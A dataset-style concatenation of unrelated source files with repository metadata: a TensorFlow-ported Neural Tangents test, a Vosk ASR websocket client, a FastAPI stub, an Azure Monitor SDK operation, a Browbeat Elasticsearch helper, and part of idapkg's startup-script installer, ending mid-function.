2fd360c8b1b8c9106044034f6a8b5c2734db9c3d
|
[
"Apache-2.0"
] | 33
|
2020-07-18T18:57:54.000Z
|
2020-08-17T13:58:46.000Z
|
tests/monte_carlo_test.py
|
DarrenZhang01/Neural_Tangents_TensorFlow
|
2fd360c8b1b8c9106044034f6a8b5c2734db9c3d
|
[
"Apache-2.0"
] | 1
|
2021-08-16T19:00:06.000Z
|
2021-08-16T19:00:06.000Z
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for `utils/monte_carlo.py`."""
from absl.testing import absltest
from jax import test_util as jtu
from jax.config import config as jax_config
from jax.lib import xla_bridge
import tensorflow as tf
from tensorflow.python.ops import numpy_ops as np
from stateless_random_ops import split as tf_random_split
from stateless_random_ops import stateless_random_normal as normal
from tensorflow.random import stateless_uniform
from neural_tangents import stax
from neural_tangents.utils import batch
from neural_tangents.utils import empirical
from neural_tangents.utils import monte_carlo
from neural_tangents.utils import test_utils
jax_config.parse_flags_with_absl()
BATCH_SIZES = [
1,
2,
4,
]
DEVICE_COUNTS = [0, 1, 2]
STORE_ON_DEVICE = [True, False]
N_SAMPLES = 4
ALL_GET = ('nngp', 'ntk', ('nngp', 'ntk'), None)
test_utils.update_test_tolerance()
def _get_inputs_and_model(width=1, n_classes=2, use_conv=True):
key = stateless_uniform(shape=[2], seed=[1, 1], minval=None, maxval=None, dtype=tf.int32)
keys = tf_random_split(key)
key = keys[0]
split = keys[1]
x1 = np.asarray(normal((8, 4, 3, 2), seed=key))
x2 = np.asarray(normal((4, 4, 3, 2), seed=split))
if not use_conv:
x1 = np.reshape(x1, (x1.shape[0], -1))
x2 = np.reshape(x2, (x2.shape[0], -1))
init_fn, apply_fn, kernel_fn = stax.serial(
stax.Conv(width, (3, 3)) if use_conv else stax.Dense(width),
stax.Relu(),
stax.Flatten(),
stax.Dense(n_classes, 2., 0.5))
return x1, x2, init_fn, apply_fn, kernel_fn, key
class MonteCarloTest(jtu.JaxTestCase):
@jtu.parameterized.named_parameters(
jtu.cases_from_list({
'testcase_name': '[batch_size={}, '
'device_count={} '
'store_on_device={} '
'get={} '
']'.format(batch_size,
device_count,
store_on_device,
get),
'batch_size': batch_size,
'device_count': device_count,
'store_on_device': store_on_device,
'get': get,
} for batch_size in BATCH_SIZES for device_count in DEVICE_COUNTS
for store_on_device in STORE_ON_DEVICE
for get in ALL_GET))
def test_sample_once_batch(self, batch_size, device_count, store_on_device,
get):
test_utils.stub_out_pmap(batch, device_count)
x1, x2, init_fn, apply_fn, _, key = _get_inputs_and_model()
kernel_fn = empirical.empirical_kernel_fn(apply_fn)
sample_once_fn = monte_carlo._sample_once_kernel_fn(kernel_fn, init_fn)
sample_once_batch_fn = monte_carlo._sample_once_kernel_fn(
kernel_fn, init_fn, batch_size, device_count, store_on_device)
one_sample = sample_once_fn(x1, x2, key, get)
one_sample_batch = sample_once_batch_fn(x1, x2, key, get)
self.assertAllClose(one_sample, one_sample_batch)
@jtu.parameterized.named_parameters(
jtu.cases_from_list({
'testcase_name': '[batch_size={}, '
'device_count={} '
'store_on_device={} '
'get={} '
']'.format(batch_size, device_count, store_on_device,
get),
'batch_size': batch_size,
'device_count': device_count,
'store_on_device': store_on_device,
'get': get,
} for batch_size in BATCH_SIZES for device_count in DEVICE_COUNTS
for store_on_device in STORE_ON_DEVICE
for get in ALL_GET))
def test_batch_sample_once(self, batch_size, device_count, store_on_device,
get):
test_utils.stub_out_pmap(batch, device_count)
x1, x2, init_fn, apply_fn, _, key = _get_inputs_and_model()
kernel_fn = empirical.empirical_kernel_fn(apply_fn)
sample_once_fn = monte_carlo._sample_once_kernel_fn(
kernel_fn, init_fn, device_count=0)
batch_sample_once_fn = batch.batch(sample_once_fn, batch_size,
device_count, store_on_device)
one_sample = sample_once_fn(x1, x2, key, get)
one_batch_sample = batch_sample_once_fn(x1, x2, key, get)
self.assertAllClose(one_sample, one_batch_sample)
@jtu.parameterized.named_parameters(
jtu.cases_from_list({
'testcase_name': '[batch_size={}, '
'device_count={} '
'store_on_device={} '
']'.format(batch_size, device_count, store_on_device
),
'batch_size': batch_size,
'device_count': device_count,
'store_on_device': store_on_device,
} for batch_size in BATCH_SIZES for device_count in DEVICE_COUNTS
for store_on_device in STORE_ON_DEVICE))
def test_sample_vs_analytic_nngp(self, batch_size, device_count,
store_on_device):
test_utils.stub_out_pmap(batch, device_count)
x1, x2, init_fn, apply_fn, stax_kernel_fn, key = _get_inputs_and_model(
1024, 256, xla_bridge.get_backend().platform == 'tpu')
sample = monte_carlo.monte_carlo_kernel_fn(init_fn, apply_fn, key, 200,
batch_size, device_count,
store_on_device)
ker_empirical = sample(x1, x2, 'nngp')
ker_analytic = stax_kernel_fn(x1, x2, 'nngp')
test_utils.assert_close_matrices(self, ker_analytic, ker_empirical, 2e-2)
@jtu.parameterized.named_parameters(
jtu.cases_from_list({
'testcase_name': '[batch_size={}, '
'device_count={} '
'store_on_device={} '
']'.format(batch_size, device_count, store_on_device
),
'batch_size': batch_size,
'device_count': device_count,
'store_on_device': store_on_device,
} for batch_size in BATCH_SIZES for device_count in DEVICE_COUNTS
for store_on_device in STORE_ON_DEVICE))
def test_monte_carlo_vs_analytic_ntk(self, batch_size, device_count,
store_on_device):
test_utils.stub_out_pmap(batch, device_count)
x1, x2, init_fn, apply_fn, stax_kernel_fn, key = _get_inputs_and_model(
256, 2, xla_bridge.get_backend().platform == 'tpu')
sample = monte_carlo.monte_carlo_kernel_fn(init_fn, apply_fn, key, 100,
batch_size, device_count,
store_on_device)
ker_empirical = sample(x1, x2, 'ntk')
ker_analytic = stax_kernel_fn(x1, x2, 'ntk')
test_utils.assert_close_matrices(self, ker_analytic, ker_empirical, 2e-2)
@jtu.parameterized.named_parameters(
jtu.cases_from_list({
'testcase_name': '[batch_size={}, '
'device_count={} '
'store_on_device={} '
'get={}'
']'.format(batch_size, device_count, store_on_device,
get),
'batch_size': batch_size,
'device_count': device_count,
'store_on_device': store_on_device,
'get': get
} for batch_size in BATCH_SIZES for device_count in DEVICE_COUNTS
for store_on_device in STORE_ON_DEVICE
for get in ALL_GET))
def test_monte_carlo_generator(self, batch_size, device_count,
store_on_device, get):
test_utils.stub_out_pmap(batch, device_count)
x1, x2, init_fn, apply_fn, stax_kernel_fn, key = _get_inputs_and_model(8, 1)
x3, x4, _, _, _, _ = _get_inputs_and_model(8, 1)
log_n_max = 4
n_samples = [2**k for k in range(log_n_max)]
sample_generator = monte_carlo.monte_carlo_kernel_fn(
init_fn, apply_fn, key, n_samples, batch_size, device_count,
store_on_device)
if get is None:
samples_12 = sample_generator(x1, x2)
samples_34 = sample_generator(x3, x4)
count = 0
for n, s_12, s_34 in zip(n_samples, samples_12, samples_34):
sample_fn = monte_carlo.monte_carlo_kernel_fn(init_fn, apply_fn, key,
n, batch_size,
device_count,
store_on_device)
sample_12 = sample_fn(x1, x2)
sample_34 = sample_fn(x3, x4)
self.assertAllClose(s_12, sample_12)
self.assertAllClose(s_12, s_34)
self.assertAllClose(s_12, sample_34)
count += 1
self.assertEqual(log_n_max, count)
ker_analytic_12 = stax_kernel_fn(x1, x2, ('nngp', 'ntk'))
ker_analytic_34 = stax_kernel_fn(x3, x4, ('nngp', 'ntk'))
else:
samples_12 = sample_generator(x1, x2, get)
samples_34 = sample_generator(x3, x4, get)
count = 0
for n, s_12, s_34 in zip(n_samples, samples_12, samples_34):
sample_fn = monte_carlo.monte_carlo_kernel_fn(
init_fn, apply_fn, key, n, batch_size,
device_count, store_on_device)
sample_12 = sample_fn(x1, x2, get)
sample_34 = sample_fn(x3, x4, get)
self.assertAllClose(s_12, sample_12)
self.assertAllClose(s_12, s_34)
self.assertAllClose(s_12, sample_34)
count += 1
self.assertEqual(log_n_max, count)
ker_analytic_12 = stax_kernel_fn(x1, x2, get)
ker_analytic_34 = stax_kernel_fn(x3, x4, get)
self.assertAllClose(ker_analytic_12, s_12, atol=2., rtol=2.)
self.assertAllClose(ker_analytic_12, ker_analytic_34)
if __name__ == '__main__':
absltest.main()
| 39.550562
| 91
| 0.61108
|
8a70aa657e21622afe49b2fe1e53c11166610e76
| 2,443
|
py
|
Python
|
test/asr-test.py
|
format37/vosk-api-gpu
|
05e5130b6deea320fe2967937de5006a7298f024
|
[
"Apache-2.0"
] | null | null | null |
test/asr-test.py
|
format37/vosk-api-gpu
|
05e5130b6deea320fe2967937de5006a7298f024
|
[
"Apache-2.0"
] | null | null | null |
test/asr-test.py
|
format37/vosk-api-gpu
|
05e5130b6deea320fe2967937de5006a7298f024
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
# https://raw.githubusercontent.com/alphacep/vosk-server/master/client-samples/python/asr-test.py
import asyncio
import websockets
import sys
import os
import datetime
import pickle
import json
if len(sys.argv) != 4:
print('Wrong parameters count. Please pass:')
print('1. Count of files to test')
print('2. path to files')
print('3. server address')
exit()
time_start = datetime.datetime.now()
files_data = {}
async def hello(uri):
async with websockets.connect(uri) as websocket:
def get_files(path):
for root, dirs, files in os.walk(path):
files.sort()
return files
counter = 0
with open('transcribation.txt', 'w') as textfile:
for file in get_files(sys.argv[2]):
#phrases = transcribe_vosk(sys.argv[1]+'/'+file, model)
counter += 1
if counter > int(sys.argv[1]):
break
                print(' = = [', counter, '] = =', file)
wf = open(sys.argv[2]+file, "rb")
file_data = []
textfile.write('=== '+str(file)+'\n')
while True:
data = wf.read(8000)
if len(data) == 0:
break
await websocket.send(data)
accept = json.loads(await websocket.recv())
#file_data.append(accept)
if len(accept)>1 and accept['text'] != '':
file_data.append(accept['text'])
textfile.write(str(accept['text'])+'\n')
else:
[[key, value]] = accept.items()
if key == 'text' and len(value):
file_data.append(value)
textfile.write(str(value)+'\n')
#print (await websocket.recv())
files_data[file] = file_data
await websocket.send('{"eof" : 1}')
print (await websocket.recv())
asyncio.get_event_loop().run_until_complete(
hello('ws://'+sys.argv[3]+':2700'))
time_end = datetime.datetime.now()
print('spent', (time_end - time_start).seconds, 'seconds')
with open('files_data.pickle', 'wb') as pickle_file:
    pickle.dump(files_data, file=pickle_file)
print('job complete!')
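# Example invocation (a sketch only -- the count, directory and host below are
# placeholder values, not defaults of this script):
#
#   python3 asr-test.py 10 ./wav/ 127.0.0.1
#
# Note the trailing slash on the directory: the script concatenates sys.argv[2]
# and the file name directly. Transcripts are written to transcribation.txt and
# the raw per-file results are pickled to files_data.pickle in the working directory.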
| 30.5375
| 97
| 0.496521
|
a634cfd7782fae44d40c51c590c50cf7b60b9819
| 1,498
|
py
|
Python
|
tests/data/expected/openapi/remote_ref/body_and_parameters/main.py
|
sondrelg/fastapi-code-generator
|
6080b31b18bcf34708b821f9de709af77c05592b
|
[
"MIT"
] | null | null | null |
tests/data/expected/openapi/remote_ref/body_and_parameters/main.py
|
sondrelg/fastapi-code-generator
|
6080b31b18bcf34708b821f9de709af77c05592b
|
[
"MIT"
] | null | null | null |
tests/data/expected/openapi/remote_ref/body_and_parameters/main.py
|
sondrelg/fastapi-code-generator
|
6080b31b18bcf34708b821f9de709af77c05592b
|
[
"MIT"
] | null | null | null |
# generated by fastapi-codegen:
# filename: body_and_parameters.yaml
# timestamp: 2020-06-19T00:00:00+00:00
from __future__ import annotations
from typing import List, Optional
from fastapi import FastAPI, Query
from .models import Pet, PetForm
app = FastAPI(version="1.0.0", title="Swagger Petstore", license="{'name': 'MIT'}",)
@app.get('/foo', response_model=str)
def get_foo(foo: Optional[str] = None) -> str:
pass
@app.post('/food', response_model=None)
def post_food(body: str) -> None:
"""
Create a food
"""
pass
@app.get('/food/{food_id}', response_model=List[int])
def show_food_by_id(
food_id: str, message_texts: Optional[List[str]] = None
) -> List[int]:
"""
Info for a specific pet
"""
pass
@app.get('/pets', response_model=List[Pet])
def list_pets(
limit: Optional[int] = 0,
home_address: Optional[str] = Query('Unknown', alias='HomeAddress'),
kind: Optional[str] = 'dog',
) -> List[Pet]:
"""
List all pets
"""
pass
@app.post('/pets', response_model=None)
def post_pets(body: PetForm) -> None:
"""
Create a pet
"""
pass
@app.get('/pets/{pet_id}', response_model=Pet)
def show_pet_by_id(pet_id: str = Query(..., alias='petId')) -> Pet:
"""
Info for a specific pet
"""
pass
@app.put('/pets/{pet_id}', response_model=None)
def put_pets_pet_id(
pet_id: str = Query(..., alias='petId'), body: PetForm = None
) -> None:
"""
update a pet
"""
pass
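# One way to exercise the generated stubs locally (a sketch; assumes this file is
# importable as the module "main" and that uvicorn is installed):
#
#   uvicorn main:app --reload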
| 19.973333
| 84
| 0.626168
|
a16847bb3ecd913304f793ad4e7cac041465b05c
| 6,981
|
py
|
Python
|
sdk/monitor/azure-mgmt-monitor/azure/mgmt/monitor/v2016_09_01/aio/operations/_metrics_operations.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 3
|
2020-06-23T02:25:27.000Z
|
2021-09-07T18:48:11.000Z
|
sdk/monitor/azure-mgmt-monitor/azure/mgmt/monitor/v2016_09_01/aio/operations/_metrics_operations.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 510
|
2019-07-17T16:11:19.000Z
|
2021-08-02T08:38:32.000Z
|
sdk/monitor/azure-mgmt-monitor/azure/mgmt/monitor/v2016_09_01/aio/operations/_metrics_operations.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 5
|
2019-09-04T12:51:37.000Z
|
2020-09-16T07:28:40.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class MetricsOperations:
"""MetricsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~$(python-base-namespace).v2016_09_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list(
self,
resource_uri: str,
filter: Optional[str] = None,
**kwargs
) -> AsyncIterable["_models.MetricCollection"]:
"""Lists the metric values for a resource.
:param resource_uri: The identifier of the resource.
:type resource_uri: str
:param filter: Reduces the set of data collected.:code:`<br>`The filter is optional. If present
it must contain a list of metric names to retrieve of the form: *(name.value eq 'metricName'
[or name.value eq 'metricName' or ...])*. Optionally, the filter can contain conditions for the
following attributes *aggregationType*\ , *startTime*\ , *endTime*\ , and *timeGrain* of the
form *attributeName operator value*. Where operator is one of *ne*\ , *eq*\ , *gt*\ ,
*lt*.:code:`<br>`Several conditions can be combined with parentheses and logical operators,
e.g: *and*\ , *or*.:code:`<br>`Some example filter expressions are::code:`<br>`-
$filter=(name.value eq 'RunsSucceeded') and aggregationType eq 'Total' and startTime eq
2016-02-20 and endTime eq 2016-02-21 and timeGrain eq duration'PT1M',:code:`<br>`-
$filter=(name.value eq 'RunsSucceeded') and (aggregationType eq 'Total' or aggregationType eq
'Average') and startTime eq 2016-02-20 and endTime eq 2016-02-21 and timeGrain eq
duration'PT1H',:code:`<br>`- $filter=(name.value eq 'ActionsCompleted' or name.value eq
'RunsSucceeded') and (aggregationType eq 'Total' or aggregationType eq 'Average') and startTime
eq 2016-02-20 and endTime eq 2016-02-21 and timeGrain eq
duration'PT1M'.:code:`<br>`:code:`<br>`\ **NOTE**\ : When a metrics query comes in with
multiple metrics, but with no aggregation types defined, the service will pick the Primary
aggregation type of the first metrics to be used as the default aggregation type for all the
metrics.
:type filter: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either MetricCollection or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~$(python-base-namespace).v2016_09_01.models.MetricCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.MetricCollection"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-09-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceUri': self._serialize.url("resource_uri", resource_uri, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if filter is not None:
query_parameters['$filter'] = self._serialize.query("filter", filter, 'str')
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('MetricCollection', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(_models.ErrorResponse, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/{resourceUri}/providers/microsoft.insights/metrics'} # type: ignore
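# Rough usage sketch (not part of the generated code). The operation returns an
# AsyncItemPaged, so callers iterate asynchronously; the client construction,
# subscription ID and resource URI below are placeholders, and the filter string
# is taken from the docstring examples above.
#
#   from azure.identity.aio import DefaultAzureCredential
#   from azure.mgmt.monitor.v2016_09_01.aio import MonitorManagementClient
#
#   async def dump_metrics(resource_uri: str) -> None:
#       async with MonitorManagementClient(DefaultAzureCredential(), "<subscription-id>") as client:
#           flt = ("(name.value eq 'RunsSucceeded') and aggregationType eq 'Total' "
#                  "and startTime eq 2016-02-20 and endTime eq 2016-02-21 "
#                  "and timeGrain eq duration'PT1M'")
#           async for metric in client.metrics.list(resource_uri, filter=flt):
#               print(metric)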
| 51.711111
| 133
| 0.655493
|
3021df6211382bc8814047a52bc9ca3af7e7ffd4
| 13,001
|
py
|
Python
|
browbeat/elastic.py
|
jsitnicki/browbeat
|
f5f9dcef2375a28fed8cc97f973eeecabd2114b7
|
[
"Apache-2.0"
] | null | null | null |
browbeat/elastic.py
|
jsitnicki/browbeat
|
f5f9dcef2375a28fed8cc97f973eeecabd2114b7
|
[
"Apache-2.0"
] | null | null | null |
browbeat/elastic.py
|
jsitnicki/browbeat
|
f5f9dcef2375a28fed8cc97f973eeecabd2114b7
|
[
"Apache-2.0"
] | 1
|
2019-12-01T14:35:28.000Z
|
2019-12-01T14:35:28.000Z
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from collections import deque
import datetime
import json
import logging
import os
import re
import sys
import time
import uuid
import elasticsearch
from elasticsearch import helpers
browbeat_uuid = uuid.uuid4()
class Elastic(object):
def __init__(self, config, workload, tool="browbeat", cache_size=1000, max_cache_time=10):
self.config = config
self.cache = deque()
self.max_cache_size = cache_size
self.last_upload = datetime.datetime.utcnow()
self.max_cache_age = datetime.timedelta(minutes=max_cache_time)
self.logger = logging.getLogger('browbeat.elastic')
self.es = elasticsearch.Elasticsearch([
{'host': self.config['elasticsearch']['host'],
'port': self.config['elasticsearch']['port']}],
send_get_body_as='POST'
)
self.workload = workload
today = datetime.datetime.today()
self.index = "{}-{}-{}".format(tool,
workload, today.strftime('%Y.%m.%d'))
def __del__(self):
self.flush_cache()
def load_json(self, result):
json_data = None
self.logger.info("Loading JSON")
json_data = json.loads(result)
return json_data
def load_json_file(self, result):
json_data = None
self.logger.info("Loading JSON file : {}".format(result))
try:
with open(result) as jdata:
json_data = json.load(jdata)
except (IOError, OSError):
self.logger.error("Error loading JSON file : {}".format(result))
return False
return json_data
def combine_metadata(self, result):
if (self.config['elasticsearch']['metadata_files'] is not None and
len(self.config['elasticsearch']['metadata_files']) > 0):
meta = self.config['elasticsearch']['metadata_files']
for _meta in meta:
try:
with open(_meta['file']) as jdata:
result[_meta['name']] = json.load(jdata)
except Exception:
self.logger.error(
"Error loading Metadata file : {}".format(
_meta['file']))
self.logger.error(
"Please make sure the metadata file exists and"
" is valid JSON or run the playbook ansible/gather/site.yml"
" before running the Browbeat test Suite")
sys.exit(1)
return result
# Used to transform the cache dict into a elastic insertable iterable
def cache_insertable_iterable(self):
output = deque()
for item in self.cache:
es_item = {}
es_item['_id'] = item['_id']
es_item['_source'] = item['result']
es_item['_type'] = item['_type']
es_item['_index'] = self.index
output.append(es_item)
return output
def flush_cache(self):
if len(self.cache) == 0:
return True
retry = 2
for i in range(retry):
try:
to_upload = helpers.parallel_bulk(self.es,
self.cache_insertable_iterable())
counter = 0
num_items = len(self.cache)
for item in to_upload:
self.logger.debug("{} of {} Elastic objects uploaded".format(num_items,
counter))
counter = counter + 1
output = "Pushed {} items to Elasticsearch to index {}".format(num_items,
self.index)
output += " and browbeat UUID {}".format(str(browbeat_uuid))
self.logger.info(output)
self.cache = deque()
self.last_upload = datetime.datetime.utcnow()
return True
except Exception as Err:
self.logger.error(
"Error pushing data to Elasticsearch, going to retry"
" in 10 seconds")
self.logger.error("Exception: {}".format(Err))
time.sleep(10)
if i == (retry - 1):
self.logger.error("Pushing Data to Elasticsearch failed in spite of retry,"
" dumping JSON for {} cached items".format(len(self.cache)))
for item in self.cache:
filename = item['test_name'] + '-' + item['identifier']
filename += '-elastic' + '.' + 'json'
elastic_file = os.path.join(item['result_dir'],
filename)
with open(elastic_file, 'w') as result_file:
json.dump(item['result'],
result_file,
indent=4,
sort_keys=True)
self.logger.info("Saved Elasticsearch consumable result JSON to {}".
format(elastic_file))
self.cache = deque()
self.last_upload = datetime.datetime.utcnow()
return False
def get_software_metadata(self, index, role, browbeat_uuid):
nodes = {}
results = self.query_uuid(index, browbeat_uuid)
pattern = re.compile(".*{}.*".format(role))
if results:
for result in results:
for metadata in result['_source']['software-metadata']:
for service in metadata:
if pattern.match(metadata[service]['node_name']):
if metadata[service]['node_name'] not in nodes:
nodes[metadata[service][
'node_name']] = metadata
return nodes
else:
self.logger.error("UUID {} wasn't found".format(browbeat_uuid))
return False
def get_version_metadata(self, index, browbeat_uuid):
version = {}
results = self.query_uuid(index, browbeat_uuid)
if results:
for result in results:
version = result['_source']['version']
return version
else:
self.logger.error("UUID {} wasn't found".format(browbeat_uuid))
"""
Currently this function will only compare two uuids. I (rook) am not convinced it is worth
the effort to engineer anything > 2.
"""
def compare_metadata(self, index, role, uuids):
meta = []
for browbeat_uuid in uuids:
self.logger.info(
"Querying Elastic : index [{}] : role [{}] : browbeat_uuid [{}] ".format(
index, role, browbeat_uuid))
software_metadata = self.get_software_metadata(
index, role, browbeat_uuid)
if software_metadata:
meta.append(software_metadata)
else:
return False
version_metadata = self.get_version_metadata(index, browbeat_uuid)
if version_metadata:
self.logger.info(
"\nUUID: {}\nVersion: {}\nBuild: {}".format(
browbeat_uuid,
version_metadata['osp_series'],
version_metadata['build']))
ignore = [
"connection",
"admin_url",
"bind_host",
"rabbit_hosts",
"auth_url",
"public_bind_host",
"host",
"key",
"url",
"auth_uri",
"coordination_url",
"swift_authurl",
"admin_token",
"memcached_servers",
"api_servers",
"osapi_volume_listen",
"nova_url",
"coordination_url",
"memcache_servers",
"novncproxy_host",
"backend_url",
"novncproxy_base_url",
"metadata_listen",
"osapi_compute_listen",
"admin_bind_host",
"glance_api_servers",
"iscsi_ip_address",
"registry_host",
"auth_address",
"swift_key",
"auth_encryption_key",
"metadata_proxy_shared_secret",
"telemetry_secret",
"heat_metadata_server_url",
"heat_waitcondition_server_url",
"transport_url"]
if len(meta) < 2:
self.logger.error("Unable to compare data-sets")
return False
for host in meta[0]:
if host not in meta[1]:
self.logger.error("Deployment differs: "
"Host [{}] missing ".format(host))
continue
for service in meta[0][host]:
for options in meta[0][host][service].keys():
if options not in meta[1][host][service]:
self.logger.error(
"UUID {} "
"- Missing Option : "
"Host [{}] Service [{}] {}".format(
uuids[1], host, service, options))
continue
if isinstance(meta[0][host][service][options], dict):
for key in meta[0][host][service][options].keys():
if key not in ignore:
if key in meta[1][host][service][options]:
value = meta[0][host][
service][options][key]
new_value = meta[1][host][
service][options][key]
if value != new_value:
self.logger.info(
"Difference found : "
"Host [{}] Service [{}] Section {} {} [{}]\n"
"New Value: {}\nOld Value: {}".format(
host,
service,
options,
key,
meta[0][host][service][
options][key],
value,
new_value))
else:
self.logger.error(
"UUID {} - Missing Value : "
"Host [{}] Service [{}] {} [{}]".format(
uuids[1], host, service, options, key))
def query_uuid(self, index, browbeat_uuid):
body = {'query': {"match": {"browbeat_uuid": {
"query": browbeat_uuid, "type": "phrase"}}}}
results = self.es.search(index=index, doc_type='result', body=body)
if len(results['hits']['hits']) > 0:
return results['hits']['hits']
else:
return False
def index_result(self,
result,
test_name,
result_dir,
identifier='',
_type='result',
_id=None):
data = {}
result['browbeat_uuid'] = str(browbeat_uuid)
result['cloud_name'] = self.config['browbeat']['cloud_name']
result['browbeat_config'] = self.config
data['result'] = result
data['test_name'] = test_name
data['result_dir'] = result_dir
data['identifier'] = identifier
data['_type'] = _type
data['_id'] = _id
self.cache.append(data)
now = datetime.datetime.utcnow()
if (len(self.cache) <= self.max_cache_size and
(now - self.last_upload) <= self.max_cache_age):
return True
else:
return self.flush_cache()
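# Minimal usage sketch (not part of browbeat; the config dict shows only the keys
# this module actually reads, with placeholder values):
#
#   config = {"elasticsearch": {"host": "localhost", "port": 9200,
#                               "metadata_files": None},
#             "browbeat": {"cloud_name": "mycloud"}}
#   es = Elastic(config, workload="rally")
#   es.index_result(result={"scenario": "authenticate"},
#                   test_name="authenticate",
#                   result_dir="/tmp/results")
#   es.flush_cache()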
| 41.404459
| 98
| 0.474117
|
16998aafe3ee63cf494d30333664fff295995324
| 2,675
|
py
|
Python
|
pkg/main.py
|
bruce30262/idapkg
|
5d6af9bd59c5dc886d68335119fae41491f06ea7
|
[
"MIT"
] | 125
|
2019-04-04T22:54:53.000Z
|
2021-12-15T02:13:12.000Z
|
pkg/main.py
|
bruce30262/idapkg
|
5d6af9bd59c5dc886d68335119fae41491f06ea7
|
[
"MIT"
] | 19
|
2019-04-02T15:56:37.000Z
|
2022-03-17T09:12:52.000Z
|
pkg/main.py
|
Jinmo/pm
|
5d6af9bd59c5dc886d68335119fae41491f06ea7
|
[
"MIT"
] | 14
|
2019-05-29T17:31:08.000Z
|
2021-09-26T01:34:42.000Z
|
import os
import ida_diskio
from . import __version__
from .config import g
from .logger import getLogger
from .package import LocalPackage
from .virtualenv_utils import prepare_virtualenv
log = getLogger(__name__)
RC = b"""
_idapkg_basedir = os.path.expanduser(os.path.join('~', 'idapkg'))
def init_idapkg(basedir):
"idapythonrc.py is a perfect place to initialize IDAUSR variable"
import os
import sys
import json
def usage():
print("idapkg is not installed or corrupted.")
print("please use the installation script below:")
print("https://github.com/Jinmo/idapkg")
config = os.path.join(basedir, 'config.json')
if os.path.isfile(config):
try:
with open(config, 'rb') as f:
j = json.load(f)
packages_path = j['path']['packages']
idapkg_path = os.path.join(packages_path, 'idapkg')
assert os.path.isdir(idapkg_path), "idapkg package does not exist"
# idapkg doesn't have any plugins. just load to path.
# XXX: replace this with some package-related routines
sys.path.append(idapkg_path)
from pkg.main import init_environment
init_environment()
except Exception:
import traceback
traceback.print_exc()
return usage()
else:
return usage()
init_idapkg(_idapkg_basedir)
del init_idapkg, _idapkg_basedir
"""
SEP = b'\n# idapkg version: ', b'# idapkg end\n'
def update_pythonrc():
rcpath = os.path.join(ida_diskio.get_user_idadir(), "idapythonrc.py")
sep_with_ver = SEP[0] + __version__.encode()
payload = b'%s\n%s\n%s' % (sep_with_ver, RC.strip(), SEP[1])
if os.path.isfile(rcpath):
with open(rcpath, 'rb') as f:
py = f.read()
if payload in py:
return
if all(x in py for x in SEP):
py = py.split(SEP[0], 1)
py = py[0] + py[1].split(SEP[1], 1)[1]
py = payload + py
log.info('Updating idapkg into idapythonrc.py.')
else:
py = payload
log.info('Added idapkg into idapythonrc.py. Will work after restarting!')
with open(rcpath, 'wb') as f:
